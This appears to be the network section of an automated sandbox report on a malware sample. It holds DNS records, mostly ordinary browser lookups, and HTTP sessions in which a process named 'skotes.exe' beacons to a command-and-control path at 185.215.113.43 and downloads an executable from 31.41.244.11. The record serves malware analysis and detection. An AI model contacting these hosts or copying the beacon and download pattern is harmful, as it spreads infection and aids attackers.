Dec 17, 2024 06:04:16.373684883 CET	1.1.1.1	192.168.2.5	0xc31f	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 06:04:16.373684883 CET	1.1.1.1	192.168.2.5	0xc31f	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.399760008 CET	1.1.1.1	192.168.2.5	0x4cd8	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.413183928 CET	1.1.1.1	192.168.2.5	0xa702	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.438529968 CET	1.1.1.1	192.168.2.5	0xb580	No error (0)	spocs.getpocket.com	prod.ads.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 06:04:16.438529968 CET	1.1.1.1	192.168.2.5	0xb580	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.439227104 CET	1.1.1.1	192.168.2.5	0x9de7	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 06:04:16.439227104 CET	1.1.1.1	192.168.2.5	0x9de7	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.468103886 CET	1.1.1.1	192.168.2.5	0x34bf	No error (0)	content-signature-2.cdn.mozilla.net	content-signature-chains.prod.autograph.services.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 06:04:16.468103886 CET	1.1.1.1	192.168.2.5	0x34bf	No error (0)	content-signature-chains.prod.autograph.services.mozaws.net	prod.content-signature-chains.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 06:04:16.468103886 CET	1.1.1.1	192.168.2.5	0x34bf	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.537700891 CET	1.1.1.1	192.168.2.5	0xa8fe	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.546283960 CET	1.1.1.1	192.168.2.5	0xfe15	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.609174967 CET	1.1.1.1	192.168.2.5	0x5e9c	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.668935061 CET	1.1.1.1	192.168.2.5	0x41d3	No error (0)	shavar.services.mozilla.com	shavar.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 06:04:16.681313038 CET	1.1.1.1	192.168.2.5	0x9321	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 06:04:16.681313038 CET	1.1.1.1	192.168.2.5	0x9321	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.687800884 CET	1.1.1.1	192.168.2.5	0x7a58	No error (0)	youtube.com			28	IN (0x0001)	false
Dec 17, 2024 06:04:16.688451052 CET	1.1.1.1	192.168.2.5	0x2294	No error (0)	firefox.settings.services.mozilla.com	prod.remote-settings.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 06:04:16.688451052 CET	1.1.1.1	192.168.2.5	0x2294	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.688590050 CET	1.1.1.1	192.168.2.5	0x9238	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.703232050 CET	1.1.1.1	192.168.2.5	0xbab1	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Dec 17, 2024 06:04:16.838171005 CET	1.1.1.1	192.168.2.5	0xe7e1	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.846604109 CET	1.1.1.1	192.168.2.5	0x36d9	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.972700119 CET	1.1.1.1	192.168.2.5	0x47f6	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:16.984406948 CET	1.1.1.1	192.168.2.5	0x41	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net			28	IN (0x0001)	false
Dec 17, 2024 06:04:17.123240948 CET	1.1.1.1	192.168.2.5	0xeb6b	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:17.252166986 CET	1.1.1.1	192.168.2.5	0x1c8	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:17.690009117 CET	1.1.1.1	192.168.2.5	0xf19c	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:17.768241882 CET	1.1.1.1	192.168.2.5	0x252b	No error (0)	example.org		93.184.215.14	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:17.768376112 CET	1.1.1.1	192.168.2.5	0x2aa2	No error (0)	ipv4only.arpa		192.0.0.170	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:17.768376112 CET	1.1.1.1	192.168.2.5	0x2aa2	No error (0)	ipv4only.arpa		192.0.0.171	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:17.771667957 CET	1.1.1.1	192.168.2.5	0x2fd5	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 06:04:17.771667957 CET	1.1.1.1	192.168.2.5	0x2fd5	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:17.828497887 CET	1.1.1.1	192.168.2.5	0x9b40	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:18.865133047 CET	1.1.1.1	192.168.2.5	0xf137	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 17, 2024 06:04:18.865334988 CET	1.1.1.1	192.168.2.5	0x6d77	No error (0)	www.google.com		142.250.181.132	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:19.057758093 CET	1.1.1.1	192.168.2.5	0x7067	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:19.481425047 CET	1.1.1.1	192.168.2.5	0x5b84	No error (0)	fivetk5pn.top		104.154.220.71	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:19.883635998 CET	1.1.1.1	192.168.2.5	0xcc41	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 06:04:19.883635998 CET	1.1.1.1	192.168.2.5	0xcc41	No error (0)	star-mini.c10r.facebook.com		157.240.195.35	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:19.885160923 CET	1.1.1.1	192.168.2.5	0xea3a	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 06:04:19.885160923 CET	1.1.1.1	192.168.2.5	0xea3a	No error (0)	youtube-ui.l.google.com		142.250.181.14	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:19.885160923 CET	1.1.1.1	192.168.2.5	0xea3a	No error (0)	youtube-ui.l.google.com		172.217.19.14	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:19.885160923 CET	1.1.1.1	192.168.2.5	0xea3a	No error (0)	youtube-ui.l.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:19.885160923 CET	1.1.1.1	192.168.2.5	0xea3a	No error (0)	youtube-ui.l.google.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:19.885160923 CET	1.1.1.1	192.168.2.5	0xea3a	No error (0)	youtube-ui.l.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:19.885160923 CET	1.1.1.1	192.168.2.5	0xea3a	No error (0)	youtube-ui.l.google.com		216.58.208.238	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:19.885160923 CET	1.1.1.1	192.168.2.5	0xea3a	No error (0)	youtube-ui.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:19.885160923 CET	1.1.1.1	192.168.2.5	0xea3a	No error (0)	youtube-ui.l.google.com		142.250.181.46	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:19.885160923 CET	1.1.1.1	192.168.2.5	0xea3a	No error (0)	youtube-ui.l.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:19.885160923 CET	1.1.1.1	192.168.2.5	0xea3a	No error (0)	youtube-ui.l.google.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:19.885160923 CET	1.1.1.1	192.168.2.5	0xea3a	No error (0)	youtube-ui.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:19.954036951 CET	1.1.1.1	192.168.2.5	0xcf53	No error (0)	www.wikipedia.org	dyna.wikimedia.org		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 06:04:19.954036951 CET	1.1.1.1	192.168.2.5	0xcf53	No error (0)	dyna.wikimedia.org		185.15.58.224	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.022686958 CET	1.1.1.1	192.168.2.5	0x9aa5	No error (0)	star-mini.c10r.facebook.com		157.240.195.35	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.022993088 CET	1.1.1.1	192.168.2.5	0x8d50	No error (0)	youtube-ui.l.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.022993088 CET	1.1.1.1	192.168.2.5	0x8d50	No error (0)	youtube-ui.l.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.022993088 CET	1.1.1.1	192.168.2.5	0x8d50	No error (0)	youtube-ui.l.google.com		142.250.181.46	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.022993088 CET	1.1.1.1	192.168.2.5	0x8d50	No error (0)	youtube-ui.l.google.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.022993088 CET	1.1.1.1	192.168.2.5	0x8d50	No error (0)	youtube-ui.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.022993088 CET	1.1.1.1	192.168.2.5	0x8d50	No error (0)	youtube-ui.l.google.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.022993088 CET	1.1.1.1	192.168.2.5	0x8d50	No error (0)	youtube-ui.l.google.com		142.250.181.14	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.022993088 CET	1.1.1.1	192.168.2.5	0x8d50	No error (0)	youtube-ui.l.google.com		172.217.19.14	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.022993088 CET	1.1.1.1	192.168.2.5	0x8d50	No error (0)	youtube-ui.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.022993088 CET	1.1.1.1	192.168.2.5	0x8d50	No error (0)	youtube-ui.l.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.022993088 CET	1.1.1.1	192.168.2.5	0x8d50	No error (0)	youtube-ui.l.google.com		216.58.208.238	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.092880011 CET	1.1.1.1	192.168.2.5	0x1772	No error (0)	dyna.wikimedia.org		185.15.58.224	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.163606882 CET	1.1.1.1	192.168.2.5	0xe32	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 17, 2024 06:04:20.163606882 CET	1.1.1.1	192.168.2.5	0xe32	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 17, 2024 06:04:20.163606882 CET	1.1.1.1	192.168.2.5	0xe32	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 17, 2024 06:04:20.163606882 CET	1.1.1.1	192.168.2.5	0xe32	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 17, 2024 06:04:20.165854931 CET	1.1.1.1	192.168.2.5	0x3c2d	No error (0)	star-mini.c10r.facebook.com			28	IN (0x0001)	false
Dec 17, 2024 06:04:20.231909990 CET	1.1.1.1	192.168.2.5	0xe418	No error (0)	dyna.wikimedia.org			28	IN (0x0001)	false
Dec 17, 2024 06:04:20.302575111 CET	1.1.1.1	192.168.2.5	0xc4ad	No error (0)	www.reddit.com	reddit.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 06:04:20.302575111 CET	1.1.1.1	192.168.2.5	0xc4ad	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.302575111 CET	1.1.1.1	192.168.2.5	0xc4ad	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.302575111 CET	1.1.1.1	192.168.2.5	0xc4ad	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.302575111 CET	1.1.1.1	192.168.2.5	0xc4ad	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.303585052 CET	1.1.1.1	192.168.2.5	0xb303	No error (0)	twitter.com		104.244.42.193	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.371098995 CET	1.1.1.1	192.168.2.5	0xcf6c	No error (0)	support.mozilla.org	prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 06:04:20.371098995 CET	1.1.1.1	192.168.2.5	0xcf6c	No error (0)	prod.sumo.prod.webservices.mozgcp.net	us-west1.prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 06:04:20.371098995 CET	1.1.1.1	192.168.2.5	0xcf6c	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.441514015 CET	1.1.1.1	192.168.2.5	0x8f82	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.441514015 CET	1.1.1.1	192.168.2.5	0x8f82	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.441514015 CET	1.1.1.1	192.168.2.5	0x8f82	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.441514015 CET	1.1.1.1	192.168.2.5	0x8f82	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.441529036 CET	1.1.1.1	192.168.2.5	0x5e55	No error (0)	twitter.com		104.244.42.193	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:20.511688948 CET	1.1.1.1	192.168.2.5	0x400d	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:22.381823063 CET	1.1.1.1	192.168.2.5	0x9b6	No error (0)	fivetk5pn.top		104.154.220.71	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:25.576759100 CET	1.1.1.1	192.168.2.5	0xf6d1	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 06:04:25.581238031 CET	1.1.1.1	192.168.2.5	0x4c12	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 06:04:25.581238031 CET	1.1.1.1	192.168.2.5	0x4c12	No error (0)	plus.l.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:26.570950985 CET	1.1.1.1	192.168.2.5	0x430c	No error (0)	play.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:46.097834110 CET	1.1.1.1	192.168.2.5	0xff10	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:46.112332106 CET	1.1.1.1	192.168.2.5	0x9529	No error (0)	services.addons.mozilla.org		151.101.65.91	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:46.112332106 CET	1.1.1.1	192.168.2.5	0x9529	No error (0)	services.addons.mozilla.org		151.101.1.91	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:46.112332106 CET	1.1.1.1	192.168.2.5	0x9529	No error (0)	services.addons.mozilla.org		151.101.129.91	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:46.112332106 CET	1.1.1.1	192.168.2.5	0x9529	No error (0)	services.addons.mozilla.org		151.101.193.91	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:46.157778025 CET	1.1.1.1	192.168.2.5	0x2fae	No error (0)	normandy.cdn.mozilla.net	normandy-cdn.services.mozilla.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 06:04:46.157778025 CET	1.1.1.1	192.168.2.5	0x2fae	No error (0)	normandy-cdn.services.mozilla.com		35.201.103.21	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:46.250643015 CET	1.1.1.1	192.168.2.5	0x7994	No error (0)	services.addons.mozilla.org		151.101.193.91	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:46.250643015 CET	1.1.1.1	192.168.2.5	0x7994	No error (0)	services.addons.mozilla.org		151.101.1.91	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:46.250643015 CET	1.1.1.1	192.168.2.5	0x7994	No error (0)	services.addons.mozilla.org		151.101.129.91	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:46.250643015 CET	1.1.1.1	192.168.2.5	0x7994	No error (0)	services.addons.mozilla.org		151.101.65.91	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:46.302619934 CET	1.1.1.1	192.168.2.5	0x230e	No error (0)	normandy-cdn.services.mozilla.com		35.201.103.21	A (IP address)	IN (0x0001)	false
Dec 17, 2024 06:04:46.392965078 CET	1.1.1.1	192.168.2.5	0xbf1b	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Dec 17, 2024 06:04:46.392965078 CET	1.1.1.1	192.168.2.5	0xbf1b	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Dec 17, 2024 06:04:46.392965078 CET	1.1.1.1	192.168.2.5	0xbf1b	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Dec 17, 2024 06:04:46.392965078 CET	1.1.1.1	192.168.2.5	0xbf1b	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49817	185.215.113.43	80	2704	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:03:03.858668089 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 17, 2024 06:03:05.331137896 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 17 Dec 2024 05:03:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49827	185.215.113.43	80	2704	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:03:06.961087942 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 35 32 37 37 33 42 32 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB52773B25C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 17, 2024 06:03:08.323343039 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 17 Dec 2024 05:03:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 32 66 0d 0a 20 3c 63 3e 31 30 31 36 34 38 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 30 37 30 38 31 34 65 34 38 62 37 34 36 65 39 30 33 35 36 34 64 35 62 39 63 64 33 65 39 35 36 62 37 62 35 64 31 23 31 30 31 36 34 39 30 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 39 36 61 38 30 35 31 34 35 62 30 30 32 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 31 30 31 36 34 39 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 64 37 33 39 33 35 37 34 64 66 31 34 31 65 35 34 32 34 30 34 33 35 38 64 36 64 39 66 63 31 64 23 31 30 31 36 34 39 32 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 [TRUNCATED] Data Ascii: 42f <c>1016489001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc070814e48b746e903564d5b9cd3e956b7b5d1#1016490001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc96a805145b002ab5e45425197d1aa1daaa8#1016491001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7393574df141e542404358d6d9fc1d#1016492001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc67e805545b01cf64d4a485a9592e100b7#1016493001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1016494001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1016495001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1016496001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#1016497001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#1016498001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb02ab5e45425197d1aa1daaa8#1016499001+++b5937c1a99d5f9df0b5dafc85062 [TRUNCATED]
Dec 17, 2024 06:03:08.323355913 CET	26	IN	Data Raw: 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 25197d1aa1daaa8#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49830	31.41.244.11	80	2704	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:03:08.449872971 CET	63	OUT	GET /files/kosodium/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 17, 2024 06:03:09.775610924 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 17 Dec 2024 05:03:09 GMT Content-Type: application/octet-stream Content-Length: 1870336 Last-Modified: Mon, 16 Dec 2024 17:17:26 GMT Connection: keep-alive ETag: "676060a6-1c8a00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 a0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 49 00 00 04 00 00 77 69 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_gI@Iwi@T0h 1 H@.rsrc X@.idata 0Z@ @*@\@vpedfbia/^@fsmwrfhyId@.taggant0I"h@
Dec 17, 2024 06:03:09.775631905 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:03:09.775649071 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:03:09.775671005 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:03:09.775685072 CET	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
